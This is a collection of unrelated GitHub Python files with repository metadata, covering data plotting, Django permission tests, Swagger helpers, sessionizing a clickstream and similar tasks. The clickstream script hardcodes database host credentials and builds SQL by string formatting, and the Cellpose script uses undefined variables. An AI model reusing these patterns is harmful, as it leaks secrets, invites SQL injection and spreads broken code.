assign(\"change_keycard\", self.group, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users, [self.user])\n\n john = User.objects.create(username='John')\n assign(\"add_keycard\", john, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users, [self.user])\n\n assign(\"change_keycard\", john, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john].sort())\n\n mary = User.objects.create(username='Mary')\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john].sort())\n\n mary.groups.add(self.group)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john, mary].sort())\n\n assign(\"change_keycard\", mary, self.keycard)\n users = list(get_users_with_perm(self.keycard, 'change_keycard').all())\n self.assertEqual(users.sort(), [self.user, john, mary].sort())\n\n","repo_name":"canassa/django-guardian","sub_path":"guardian/tests/shortcuts_test.py","file_name":"shortcuts_test.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"70766643099","text":"import csv\n\ninp = []\ncss = {}\nejs = {}\n\nwith open('NeuronConnectOrig.csv', 'r') as f:\n reader = csv.reader(f)\n next(reader, None)\n inp = [row for row in reader]\n\n\nfor row in inp:\n #print(row)\n if row[2] == \"EJ\":\n if (row[0], row[1]) in ejs:\n ejs[(row[0], row[1])] += int(row[3])\n else:\n ejs[(row[0], row[1])] = int(row[3])\n if (row[2] == \"S\" or row[2] == \"Sp\"):\n if (row[0], row[1]) in css:\n css[(row[0], row[1])] += int(row[3])\n else:\n css[(row[0], row[1])] = int(row[3])\n\n#EJs are back and forth connections\nfor ej in ejs:\n if (ej[1], ej[0]) not in ejs:\n print(ej)\n\nwith open('edges_wo_muscles.csv', 'a') as f:\n f.write(\"Neuron 1,Neuron 2,Type,Nbr\\n\")\n for key,value in ejs.items():\n to_write = key[0] + \";\" + key[1] + \";EJ;\" + str(value) + \"\\n\"\n f.write(to_write)\n\n for key,value in css.items():\n to_write = key[0] + \";\" + key[1] + \";CS;\" + str(value) + \"\\n\"\n f.write(to_write)\n","repo_name":"hellothisisnathan/Mouse_Controllability","sub_path":"Celegans/hungarian dude's code/data/generate_edges_wo_muscles.py","file_name":"generate_edges_wo_muscles.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4087290004","text":"from drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg.openapi import Parameter, IN_QUERY\nclass PostSwagger:\n def __init__(self, params, required, summary, description=None, examples_={\n \"application/json\": {\n \"gcode\": 0,\n \"success\": True,\n \"data\" : \"\"\n }\n }):\n self.params = {}\n for p in params:\n self.params[p] = openapi.Schema(type=params[p])\n self.req = openapi.Schema(type=openapi.TYPE_OBJECT, properties=self.params,required=required)\n self.res = {\n \"200\": openapi.Response(\n description=\"성공\",\n examples=examples_\n )\n }\n self.summary = summary\n self.description = description\n\n def get_auto_schema(self):\n return swagger_auto_schema(\n operation_summary=self.summary,\n operation_description=self.description,\n request_body=self.req,\n responses=self.res,\n )\n\nclass GetSwagger:\n def __init__(self, params, examples_, summary, description=None):\n self.params = []\n for p in params:\n self.params.append(Parameter(p, IN_QUERY, type=params[p]))\n \n self.res = {\n \"200\" : openapi.Response(\n description=\"성공\",\n examples=examples_\n )\n }\n self.summary = summary\n self.description = description\n \n def get_auto_schema(self):\n return swagger_auto_schema(\n operation_summary=self.summary, \n operation_description=self.description,\n manual_parameters=self.params,\n responses=self.res\n )","repo_name":"AgongKim/type16","sub_path":"utils/swagger_base.py","file_name":"swagger_base.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"496032461","text":"import pandas as pd\nimport sqlalchemy as sql\nimport logging\n\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\n# details of the database.\nDB_HOST = 'terraform-20191101073604464400000001.cqpira9yntzj.ap-southeast-1.rds.amazonaws.com'\nDB_USER = 'foo'\nDB_PASS = 'foobarbaz'\nDB_NAME = 'marketing'\n\n\n# return session datetime from session_id.\ndef session_datetime_from_session_id(session_id):\n session_id_split = session_id.split('_')\n return datetime.strptime(session_id_split[1] + ' ' + session_id_split[2], '%Y%m%d %H%M')\n\n\n# returns a datetime object from visit_date and visit_time details.\ndef create_datetime(v_date, v_time):\n return datetime.strptime(v_date + ' ' + v_time, '%Y%m%d %H:%M %p')\n\n\n# returns session_id given device_id, visit_date, and visit_time.\n# i_ prefix to denote inner variable.\ndef create_new_session_id(i_device_id, i_visit_date, i_visit_time):\n return 's{0}_{1}_{2}'.format(i_device_id, i_visit_date, i_visit_time.replace(':', '')[0:4])\n\n\n# updates session_id in the database.\ndef update_session_id_for_row(i_session_id, i_row_id, i_sql_engine):\n connection = i_sql_engine.connect()\n connection.execute('update clickstream set session_id = \\'{0}\\' where id = \\'{1}\\''.format(i_session_id, i_row_id))\n\n\n# returns a dataframe row containing existing sessions for a device_id.\ndef sessions_for(device_id, i_sql_engine):\n sessions_for_device_query = '''\n select device_id, session_id, visit_date, visit_time \n from clickstream where device_id = \\'{0}\\' \n and session_id is not null'''.format(device_id)\n sessions_for_device_df = pd.read_sql_query(sessions_for_device_query, i_sql_engine)\n return sessions_for_device_df\n\n\n# return last session.\ndef last_session_from_sessions(sessions):\n sessions['visit_datetime'] = sessions.apply(lambda x: create_datetime(x['visit_date'], x['visit_time']), axis=1)\n sessions_sorted = sessions.sort_values(by='visit_datetime', ascending=False)\n return sessions_sorted.iloc[0]\n\n\n# row is one row of a dataframe.\ndef process_row(row, i_sql_engine):\n row_id = row['id']\n device_id = row['device_id']\n visit_date = row['visit_date']\n visit_time = row['visit_time']\n visit_datetime = create_datetime(visit_date, visit_time)\n\n logging.info('Processing row with ID: {0}'.format(row_id))\n sessions_for_device = sessions_for(device_id, i_sql_engine)\n\n # if there is no session in the database for that device_id, then create new session.\n if sessions_for_device.empty:\n session_id = create_new_session_id(device_id, visit_date, visit_time)\n update_session_id_for_row(session_id, row_id, i_sql_engine)\n\n else:\n # get latest existing session.\n latest_session_id = last_session_from_sessions(sessions_for_device)['session_id']\n latest_session_datetime = session_datetime_from_session_id(latest_session_id)\n\n # if still within the previous session time window, then use the previous session id.\n if latest_session_datetime + timedelta(minutes=60) > visit_datetime:\n update_session_id_for_row(latest_session_id, row_id, i_sql_engine)\n\n # if not within the previous session time window, then create a new session id.\n else:\n new_session_id = create_new_session_id(device_id, visit_date, visit_time)\n update_session_id_for_row(new_session_id, row_id, i_sql_engine)\n\n\n# main method.\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n connect_string = 'mysql+mysqlconnector://{0}:{1}@{2}/{3}'.format(DB_USER, DB_PASS, DB_HOST, DB_NAME)\n sql_engine = sql.create_engine(connect_string)\n\n df = pd.read_sql_query('select * from clickstream where session_id is null', sql_engine)\n for i in range(len(df)):\n process_row(df.iloc[i], sql_engine)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"devacto/lzd","sub_path":"qn-one/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7384622066","text":"# -*-coding:utf-8-*-\n# created by HolyKwok 201610414206\n# 空气质量数据可视化\n\nimport pandas as pd\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.font_manager import FontProperties\n\n# 读取数据\ndata = pd.read_csv(\"pollution.csv\") # 默认header=True,首航作为列名\n# 1-求PM2.5和气温日平均\n# 数据预处理\nyears = list(set(data['year'])) # 年分表\nmonths = list(range(1, 13))\n# days = list(range(1, 32))\n# every_day = [(m, d) for m in months for d in days ]\n# # 求平均值,自动过滤NaN\n# pm2d5_days = []\n# temp_days = []\n# for y in years:\n# # 每年的每个月有哪天\n# list(map(pm2d5_days.append, list(map(lambda x: data.loc[(data['year'] == y) & (data['month'] == x[0]) & (data['day'] == x[1]) & (data['pm2.5'].notnull())]['pm2.5'].mean(), every_day))))\n# list(map(temp_days.append, list(map(lambda x: data.loc[(data['year'] == y) & (data['month'] == x[0]) & (data['day'] == x[1]) & (data['TEMP'].notnull())]['TEMP'].mean(), every_day))))\n# # 画图\n# font = FontProperties(fname=\"C:\\Windows\\Fonts\\msyh.ttc\", size=15) # 设置字体\n# fig = plt.figure() # 创建子图\n# pm2d5_ax = fig.add_subplot(2, 1, 1)\n# temp_ax = fig.add_subplot(2, 1, 2)\n# bar_with = 0.5 # 柱状条宽度\n# index = np.arange(len(years)* len(months) * len(days)) # 下标序列\n# pm2d5_ax.bar(index, pm2d5_days, bar_with, label='PM2.5')\n# temp_ax.bar(index, temp_days, bar_with, label='TEMP')\n# # 标题\n# pm2d5_ax.set_title(u'每年pm2.5日平均统计表', fontproperties = font)\n# temp_ax.set_title(u'每年气温日平均统计表', fontproperties = font)\n# pm2d5_ax.set_xlabel(u'日期', fontproperties = font)\n# pm2d5_ax.set_ylabel(u'平均值', fontproperties = font)\n# temp_ax.set_xlabel(u'日期', fontproperties = font)\n# temp_ax.set_ylabel(u'平均值', fontproperties = font)\n# pm2d5_ax.set_xticks([])\n# temp_ax.set_xticks([])\n# plt.show()\n# plt.close()\npm2d5_y_avg = [] # pm2.5各年平均值\ntemp_y_avg = [] # 气温各年平均值\nlist(map(pm2d5_y_avg.append, list(map(lambda x: data.loc[data['year'] == x]['pm2.5'].mean(), years))))\nlist(map(temp_y_avg.append, list(map(lambda x: data.loc[data['year'] == x]['TEMP'].mean(), years))))\n# 画图\nfont = FontProperties(fname=\"C:\\Windows\\Fonts\\msyh.ttc\", size=15) # 设置字体\nindex = np.arange(len(years))\nbar_width = 0.35\nplt.bar(index, pm2d5_y_avg, bar_width, label='pm2.5')\nplt.bar(index + bar_width, temp_y_avg, bar_width, label='temp')\nplt.title(u\"pm2.5和气温年日平均\", fontproperties = font)\nplt.xticks(index, years)\nplt.ylabel(u\"日均值\", fontproperties = font)\n\n# 2-求五年的PM2.5,气温,气压,累计降雨量趋势图\n# 数据预处理,清除NA\npm2d5_data = data.loc[data['pm2.5'].notnull()] # isnull()和notnull()返回布尔型\ntemp_data = data.loc[data['TEMP'].notnull()]\npres_data = data.loc[data['PRES'].notnull()]\niws_data = data.loc[data['Iws'].notnull()]\n# 画图\nfig = plt.figure()\n# 添加子图\npm2d5_ax = fig.add_subplot(2, 2, 1)\ntemp_ax = fig.add_subplot(2, 2, 2)\npres_ax = fig.add_subplot(2, 2, 3)\niws_ax = fig.add_subplot(2, 2, 4)\n# 向子图中添加数据\npm2d5_ax.plot(pm2d5_data['pm2.5'], \"-\", linewidth=0.2)\ntemp_ax.plot(temp_data['TEMP'], \"-\", linewidth=0.2)\npres_ax.plot(pres_data['PRES'], \"-\", linewidth=0.2)\niws_ax.plot(iws_data['Iws'], \"-\", linewidth=0.2)\n# 隐藏x轴刻度\npm2d5_ax.set_xticks([])\ntemp_ax.set_xticks([])\npres_ax.set_xticks([])\niws_ax.set_xticks([])\n# 设置标题\npm2d5_ax.set_title('pm2.5')\ntemp_ax.set_title('TEMP')\npres_ax.set_title('PRES')\niws_ax.set_title('Iws')\nplt.show()\nplt.close()\n\n# 3-统计每年PM2.5指数平均值最高的5个月,获取每天的PM2.5指数\n# 数据预处理\npm2d5_m_avg = []\nfor m in months:\n # 每年的m月平均pm2.5,注意筛选条件用括号分隔避免歧义(ambiguous)\n pm2d5_m_avg.append(list(map(lambda x: (m, data.loc[(data['year'] == x) & (data['month'] == m) & (data['pm2.5'].notnull())]['pm2.5'].mean()), years)))\n# 转置结果,\npm2d5_m_avg_T = [[row[col] for row in pm2d5_m_avg] for col in range(len(pm2d5_m_avg[0]))] # 转置\n# 进行每年的前五排序切片\npm2d5_m_avg_top5 = list(map(lambda x: sorted(x, key=lambda x: x[1], reverse=True)[:5], pm2d5_m_avg_T))\n# 按升序排列月份以便计算\npm2d5_m_avg_top5 = list(map(lambda x: sorted(x, key=lambda x: x[0]), pm2d5_m_avg_top5))\npm2d5_d_data = []\nfor i, l in enumerate(pm2d5_m_avg_top5): # 筛选每年每月的数据[y:[m:...], y:[m:...]...]\n pm2d5_d_data.append(list(map(lambda x: data.loc[(data['year'] == years[i]) & (data['month'] == x[0]) & (data['pm2.5'].notnull())], l)))\n# 画图\nplt.rcParams['figure.figsize'] = (10.0, 1.0) # 图片长宽比例\nplt.rcParams['savefig.dpi'] = 500 # 图片像素\nplt.rcParams['figure.dpi'] = 400 # 分辨率\n\nfor n, dl in enumerate(pm2d5_d_data): # 按一年组建x, y坐标\n x_data = []\n y_data = []\n for e in dl:\n # x为时间(天)\n list(map(x_data.append,list(map(lambda y, m, d, h: str(datetime.datetime(int(y), int(m), int(d), int(h))), e['year'], e['month'], e['day'], e['hour']))))\n # y为PM2.5值\n list(map(y_data.append, list(e['pm2.5'])))\n plt.plot(x_data, y_data, \"-\", linewidth=0.2)\nplt.xticks([]) # 隐藏x轴刻度\nplt.yticks(range(0, 1200, 50)) # 设置y轴刻度\nplt.tick_params(labelsize=3) # 设置刻度字体大小\nplt.show()\nplt.close()","repo_name":"ApplauseWow/IT_new_technique_assignment","sub_path":"practice2/practice2-1.py","file_name":"practice2-1.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34069077744","text":"# TABLE_CONTENTS.PY - Contains code to create tables displaying data\n\nfrom dash import dash_table\n\ndata_table = dash_table.DataTable(\n id='data-table',\n columns=[], # Specifies the table's columns, empty for now as it will be set using a callback function\n data=[], # Specifies the table's columns, empty for now as it will be set using a callback function\n fixed_rows={'headers': True }, # Headers will appear at the top of the table, even when scrolling\n style_table={ # CSS style parameters, which affect the table's appearance\n 'minHeight': '11vh'\n , 'height': '11vh'\n , 'maxHeight': '11vh'\n , 'overflow-y': 'scroll'\n , 'border': '1.5px solid #000000'\n , 'color': '#000000'\n , 'font-size': '15px'\n , 'display': 'inline-block'\n },\n style_cell={ # Affects formatting of the table's cells\n 'textAlign': 'left'\n , 'font-family': 'Arial'\n },\n style_header={ # Affects the styling of table headers\n 'fontWeight': 'bold'\n , 'whiteSpace': 'normal'\n , 'height': 'auto'\n },\n style_data={\n 'whiteSpace': 'normal'\n , 'height': 'auto'\n },\n style_cell_conditional=[ # Conditional styling can be applied, like setting column width conditional on column name\n {'if': {'column_id': 'Hello World'},\n 'width': '100%'}\n ]\n)","repo_name":"MarkVersteegh/dash-template","sub_path":"layout/table_contents.py","file_name":"table_contents.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32728188069","text":"class DetectSquares:\n\n def __init__(self):\n self.coordinateCount = defaultdict(int) # (x,y) = count\n self.points = []\n \n\n def add(self, point: List[int]) -> None:\n x, y = point\n self.coordinateCount[(x, y)] += 1\n self.points.append([x,y])\n \n\n def count(self, point: List[int]) -> int:\n x, y = point\n res = 0\n for px, py in self.points:\n if (abs(py - y) != abs(px - x)) or px == x or py == y :\n continue\n res += self.coordinateCount[(x,py)] * self.coordinateCount[(px,y)]\n \n return res\n \n \n\n\n# Your DetectSquares object will be instantiated and called as such:\n# obj = DetectSquares()\n# obj.add(point)\n# param_2 = obj.count(point)","repo_name":"mwinailan/LeetCode","sub_path":"2013-detect-squares/2013-detect-squares.py","file_name":"2013-detect-squares.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1472564333","text":"## build alternative ancestral sequences\n\nfrom fasta2seq import *\nfrom itertools import product\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\nimport json,random\n\nfp = open('spr_all.prob.json','r')\nprob = json.load(fp)\nnumseq = 1000\n#mutations = 30\n\nnodes = pd.read_csv('anc.node.txt')\nnodes = dict(zip(nodes['node'],nodes['name']))\n\n#nodes = {\"471\":\"Drosophila\"}\n#nodes = {\"471\":\"Drosophila\"}\n#471,Drosophila\n#435,Diptera\n#369,Insecta\n#312,Arthropoda\n#255,Metazoa\n#nodes = {\"435\":\"Diptera\"}\n\nfor node in nodes:\n sequence = {}\n name = nodes[node]\n node = str(node)\n print(node,name)\n\n ## all of the alternative residues ##\n alternative_residues = []\n for res_idx in prob[node]:\n alt_res = [res for res in prob[node][res_idx]]\n alternative_residues.append(alt_res)\n\n ## random sample 100 sequences ##\n N = 0\n index_list = []\n while N 1:\n #print(prob[node][res_idx])\n residues_with_ALT.append(res_idx)\n\n print(len(residues_with_ALT))\n #print(residues_with_ALT)\n\n mutations = int(len(residues_with_ALT)/2)\n residues_to_mutate = random.choices(residues_with_ALT,k=mutations)\n print(residues_to_mutate)\n\n #print([idx for idx in prob[node]])\n for res_idx in prob[node]:\n alt_res = [res for res in prob[node][res_idx]]\n alt_idx = [i for i in range(len(alt_res))]\n n = len(alt_res)\n #if n>1:\n # idx = random.choice(alt_idx)\n # index.append(idx)\n if res_idx in residues_to_mutate:\n index_pool = [i for i in range(n) if i>0]\n idx = random.choice(index_pool)\n print(res_idx,alt_res,alt_idx,idx)\n index.append(idx)\n else:\n index.append(0)\n if not all([i==0 for i in index]):\n index_list.append(index)\n N += 1\n\n nres = len(alternative_residues)\n #print(nres,len(index_list))\n for n in range(numseq):\n seq = [alternative_residues[i][index_list[n][i]] for i in range(nres)]\n #seq = [s for s in seq if s!='-']\n seq = ''.join(seq)\n sequence['%s_Alternative_%d'%(name,n)] = seq\n# print(ni,len(seq),seq)\n seq2fasta(sequence,'SPR_Anc_alternative_%s.fasta'%name)\n","repo_name":"jhpanda/DrosophilaSexPeptide","sub_path":"extract_asr.alt.py","file_name":"extract_asr.alt.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22472824050","text":"import datetime\n\nimport clipboard as clipboard\n\nfrom rivombrosa.marchingegno.comparator import get_tiers\nfrom .config import flags\n\n\nall_tiers = get_tiers()\nresult = f'*{datetime.datetime.now().strftime(\"%A, %d %B %Y, %H:%M\")}*\\n\\n'\nfor league, tiers in all_tiers.items():\n if any([len(tiers['tier_1']), len(tiers['tier_2']), len(tiers['tier_3'])]):\n result += f'{flags[league]} _{league}_\\n'\n\n for t in ('tier_1', 'tier_2', 'tier_3'):\n result += f'*{t.replace(\"_\", \" \").title()}:*\\n'\n if len(tiers[t]):\n for info in tiers[t]:\n result += f'{info[\"match\"]} *{info[\"outcome\"]}* / {info[\"odds\"]} *({info[\"coeff\"]}%)* > € {info[\"stake\"] or 1}\\n'\n else:\n result += f'_Nessun match nel {t.replace(\"_\", \" \").title()}_\\n'\n result += '\\n'\n\nprint(result)\nclipboard.copy(result)\n","repo_name":"princewav/RivombrosaWeb","sub_path":"rivombrosa/tiers_formatter.py","file_name":"tiers_formatter.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42063746989","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom time import sleep\n\ndef urlreq():\n resp = requests.get(\"http://localhost:5000/warState\")\n return resp.text\n\ndef visualizeState(state_json):\n print(state_json)\n\nif __name__ == \"__main__\":\n while True:\n state = urlreq()\n visualizeState(state)\n sleep(1)\n\n","repo_name":"OneNightROBOCON/burger_war","sub_path":"judge/visualizeConsole.py","file_name":"visualizeConsole.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
+{"seq_id":"29171475377","text":"import wx, sys\nfrom EClassWindow import EClassWindow\nsys.path.insert(0, 'model')\nfrom EClass import EClass\n \nclass JoinPresentation(wx.Frame):\n \n def __init__(self, parent):\n wx.Frame.__init__(self, None, wx.ID_ANY)\n self.SetLabel('Select a Presentation to Join')\n\n panel = wx.Panel(self, wx.ID_ANY)\n self.index = 0\n self.parent = parent\n\n self.list_ctrl = wx.ListCtrl(panel, size=(-1,100),\n style=wx.LC_REPORT\n |wx.BORDER_SUNKEN\n )\n self.list_ctrl.InsertColumn(0, 'Class')\n self.list_ctrl.InsertColumn(1, 'Last')\n self.list_ctrl.InsertColumn(2, 'First')\n self.list_ctrl.InsertColumn(3, 'Hosted')\n\n self.reasonText = wx.StaticText(panel, -1)\n self.reasonText.SetForegroundColour((255, 0, 0))\n\n btn = wx.Button(panel, label=\"Join\")\n btn.Bind(wx.EVT_BUTTON, self.join)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.reasonText, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(self.list_ctrl, 0, wx.ALL|wx.EXPAND, 5)\n sizer.Add(btn, 0, wx.ALL|wx.CENTER, 5)\n panel.SetSizer(sizer)\n self.Bind(wx.EVT_CLOSE, self.onClose)\n\n self.setClasses(EClass.GetInstance().classes)\n EClass.GetInstance().connection.registerStudentClassesListener(self.setClasses)\n\n def setClasses(self, classes):\n self.list_ctrl.DeleteAllItems()\n for c in classes:\n self.list_ctrl.Append((c['name'], c['lastname'], c['firstname'],\n 'true' if c['hosted'] else '')\n )\n\n def onClose(self, event):\n EClass.GetInstance().exit()\n\n def join(self, event):\n selected = EClass.GetInstance().classes[self.list_ctrl.GetFocusedItem()]\n\n EClass.GetInstance().connection.joinPresentation(selected['name'],\n selected['lastname'], selected['firstname'],\n self.callback\n )\n\n def callback(self, response):\n if response.success:\n window = EClassWindow()\n EClass.GetInstance().loadInitialData(response.data)\n window.showPresentation()\n self.Hide()\n else:\n self.reasonText.SetLabel(response.reason)\n \n","repo_name":"joshterrell805-historic/EClass","sub_path":"implementation/source/python/view/JoinPresentation.py","file_name":"JoinPresentation.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"29097688680","text":"\"\"\"\nRequests for pushing events to Slack\n\n\"\"\"\n\n\nclass SlackClient:\n\n headers = {\"Content-Type\": \"application/json\"}\n\n def __init__(self, session, url):\n self.session = session\n self.url = url\n\n async def slack_post(self, body):\n async with self.session.post(\n headers=self.headers, url=self.url, data=body\n ) as response:\n if response.status == 200:\n return\n else:\n print(response)","repo_name":"team-telnyx/demo-python-telnyx","sub_path":"call-center-texml/call_center/infrastructure/client/http/slackrequests.py","file_name":"slackrequests.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"69"}
+{"seq_id":"19990642640","text":"import openai\nimport os\nimport json\n\n\nopenai.api_key = input('Enter ChatGPT API Key')\n\ndef add_json(data):\n with open(\"log.json\", mode=\"r\") as file:\n messeges = json.load(file)\n messeges.append(data)\n with open(\"log.json\", mode=\"w\") as file:\n json.dump(messeges, file)\n\ndef chatgpt_response(prompt):\n add_json({\"role\": \"user\", \"content\": prompt})\n with open(\"log.json\", mode=\"r\") as file:\n json_messeges = json.load(file)\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=json_messeges,\n temperature=0.5,\n max_tokens=100\n )\n prompt_response = response['choices'][0]['message']['content']\n add_json(response['choices'][0]['message'])\n return prompt_response\n","repo_name":"ArtemChirakhov/GPTodd","sub_path":"chatgpt.py","file_name":"chatgpt.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34189312611","text":"\n\n\"\"\"\n 13.1 Word frequency analysis\n\"\"\"\n\n\nimport os \nimport string\n\ndef cleanFile(fname):\n\tfin = open(fname)\n\n\tres = []\n\n\tfor line in fin:\n\t\twords = line.split()\n\t\tfor word in words:\n\t\t\ts = word.translate(string.maketrans(\"\", \"\"), string.punctuation + string.digits)\n\t\tres.append(s.strip().lower())\n\n\treturn res \n\n#print len(cleanFile('../words.txt'))\n#print cleanFile('../words.txt')[:100]\n\n\ndef processLine(line):\n\n\twords = line.split()\n\tres = []\n\n\tfor word in words:\n\t\ts = word.translate(string.maketrans(\"\", \"\"), string.punctuation+string.digits)\n\t\tres.append(s.strip().lower())\n\n\treturn res \n\ndef processFile(fname, processLine):\n\n\td = dict()\n\twith open(fname) as fin:\n\t\tfor line in fin:\n\t\t\tlst = processLine(line)\n\t\t\tfor word in lst:\n\t\t\t\td[word] = d.get(word, 0) + 1\n\n\treturn d \n\n\n\n\n\n","repo_name":"April-Xue/thinking_python","sub_path":"ch13.py","file_name":"ch13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"856820588","text":"\"\"\"Save TissueNet as individulal TIFF files.\n\nThese files are then fed into cellpose for training.\n\nTo train the cellpose model:\n\nCUDA_VISIBLE_DEVICES=3 python -m cellpose --train \\\n--dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/train/ \\\n--test_dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/val/ \\\n--pretrained_model None \\\n--img_filter _img \\\n--mask_filter _masks \\\n--chan 2 --chan2 1 \\\n--use_gpu\n\nTo run the newly trained cellpose model:\n\nCUDA_VISIBLE_DEVICES=3 python -m cellpose \\\n--dir /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/test_run/ \\\n--pretrained_model /deepcell_data/users/willgraf/mesmer_retrain/tissue_net/seed1/train/models/cellpose_residual_on_style_on_concatenation_off_train_2021_04_26_11_35_14.114698 \\\n--chan 2 --chan2 1 \\\n--diameter 23. --save_tif --use_gpu\n\n\nTo run the pretrained version of the CellPose model:\n\npython -m cellpose\n --dir /deepcell_data/users/willgraf/cellpose/test_split_1_channels_first\n --pretrained_model cyto\n --chan 0 --chan2 1\n --diameter 0.\n --save_tif --use_gpu\n\"\"\"\n\nimport os\nimport numpy as np\nimport tifffile\n\nSEED = 1\n\nNPZ_NAME = '20201018_multiplex_seed_{}'.format(SEED)\nEXP_NAME = '20200824_hyper_parameter'\nMODEL_NAME = '{}_cellpose'.format(NPZ_NAME)\n\nROOT_DIR = '/deepcell_data'\nLOG_DIR = os.path.join(ROOT_DIR, 'logs')\nMODEL_DIR = os.path.join(ROOT_DIR, 'models', EXP_NAME)\n\nDATA_DIR = os.path.join(ROOT_DIR, 'users/willgraf/mesmer_retrain')\nTIFF_PATH = os.path.join(DATA_DIR, 'tissue_net/seed{}'.format(SEED))\n\nTRAIN_DATA_FILE = os.path.join(DATA_DIR, '{}_train_512x512.npz'.format(NPZ_NAME))\nVAL_DATA_FILE = os.path.join(DATA_DIR, '{}_val_256x256.npz'.format(NPZ_NAME))\nTEST_DATA_FILE = os.path.join(DATA_DIR, '{}_test_256x256.npz'.format(NPZ_NAME))\n\nTEST_PRED_DATA_FILE = os.path.join(DATA_DIR, '{}_test_pred.npz'.format(NPZ_NAME))\n\n\ndef save_as_tiffs(npz_path, tiff_dir):\n data = np.load(npz_path, allow_pickle=True)\n X = data['X']\n y = data['y']\n\n assert X.shape[0] == y.shape[0], 'X and y should have the same number of images.'\n\n for i in range(X.shape[0]):\n img_filename = '{:04d}_img.tif'.format(i)\n mask_filename = '{:04d}_masks.tif'.format(i)\n\n tifffile.imsave(os.path.join(tiff_dir, img_filename), X[i])\n tifffile.imsave(os.path.join(tiff_dir, mask_filename), y[i])\n print('saved %s files to %s' % (len(X), tiff_dir))\n\n\nif __name__ == '__main__':\n data_files = [\n ('train', TRAIN_DATA_FILE),\n ('val', VAL_DATA_FILE),\n ('test', TEST_DATA_FILE),\n ]\n for prefix, data_file in data_files:\n f = os.path.join(DATA_DIR, data_file)\n subdir = os.path.join(TIFF_PATH, prefix)\n if not os.path.isdir(subdir):\n os.makedirs(subdir)\n save_as_tiffs(f, subdir)\n\n X_train = train_data['X']\n y_train = train_data['y']\n\n X_val = val_data['X']\n y_val = val_data['y']\n\n X_test = test_data['X']\n y_test = test_data['y']\n","repo_name":"vanvalenlab/publication-figures","sub_path":"2021-Greenwald_Miller_et_al-Mesmer/notebooks/training/Cellpose_training.py","file_name":"Cellpose_training.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"16923359305","text":"from BristolMatchingEngine import *\nfrom time import time\n\ntvec = TraderVector()\n\nfor i in range(100_000):\n tvec.append(Trader(True, False))\n \nfor i in range(100_000):\n tvec.append(Trader(False, True))\n\nx = LimitOrderBook()\n\nt0 = time()\n\nx.run_experiment(0, 1000, tvec)\n\nprint(time() - t0)\n\nprint(len(x.get_executed_transactions()))\n","repo_name":"gabedonnan/CPPLob","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
